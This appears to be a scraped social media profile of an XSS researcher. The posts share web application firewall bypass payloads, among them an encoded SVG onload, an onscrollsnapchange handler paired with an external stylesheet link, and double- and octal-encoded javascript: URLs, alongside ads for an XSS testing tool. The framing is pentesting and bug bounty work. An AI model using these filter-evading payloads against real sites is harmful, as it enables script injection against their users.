BRute Logic

@brutelogic

#CyberSecurity #Hacking #XSS #SQLi #WAF #Bypass knoxss.me

647
Followers 25
Following 10
Posts 29.08.2024
Joined

Posts Following

Latest posts by BRute Logic @brutelogic

This might trick some #XSS filters out there, including CloudFlare's.

<Svg OnLoad="alert//>%0A(1)"

07.05.2025 15:47 👍 1 🔁 0 💬 0 📌 0

Subscription Plans Sign up now to get access to the best possible XSS testing tool! Includes BRute Logic's XSS ebook as a bonus for 1-Year subscriptions.

#BlackFriday

KNOXSS is up to 50% OFF

Check it out!

knoxss.me/?page_id=1974

#XSS #BugBounty #PenTesting

29.11.2024 16:35 👍 1 🔁 0 💬 0 📌 0

If you learn a #hacking technique but can't make it work, it's because you understand the example, not the technique.

21.11.2024 23:22 👍 2 🔁 0 💬 0 📌 0

Nice work in the original payload below.

Although "style=" (and "<link") being easily caught by most cloud WAFs I've seen out there, I've just made it shorter and "bypass friendly".

<p><dd onscrollsnapchange=alert(1)>
<link href=//X55.is/k rel=stylesheet>

PoC: brutelogic.com.br/xss.php?a=%3...

21.11.2024 19:45 👍 2 🔁 1 💬 0 📌 0

brutelogic.com.br/blog/buildin...

21.11.2024 11:37 👍 1 🔁 0 💬 0 📌 0

Some neat #XSS tricks to #Bypass #WAF in URL Context

=> HTMLi + Double Encoding + Embedded bytes

JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"

=> + Octal Encoding

JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"

Lab: brutelogic.com.br/dom/sinks.ht...

19.11.2024 15:35 👍 4 🔁 0 💬 0 📌 0

I’m so happy to see all my old twitter friends and no nefarious billionaires!!

18.11.2024 01:00 👍 44946 🔁 2205 💬 1025 📌 76

Thank you, appreciate it.

18.11.2024 09:44 👍 1 🔁 0 💬 0 📌 0

17.11.2024 23:37 👍 4 🔁 0 💬 1 📌 0

Main The State of The Art in XSS Testing. KNOXSS detects and proves with a popup 50+ XSS cases.

knoxss.me - Accuracy is everything.

10.11.2024 19:54 👍 0 🔁 0 💬 0 📌 0

#PenTesting?
Script your Password Spray.

29.08.2024 22:06 👍 1 🔁 0 💬 0 📌 0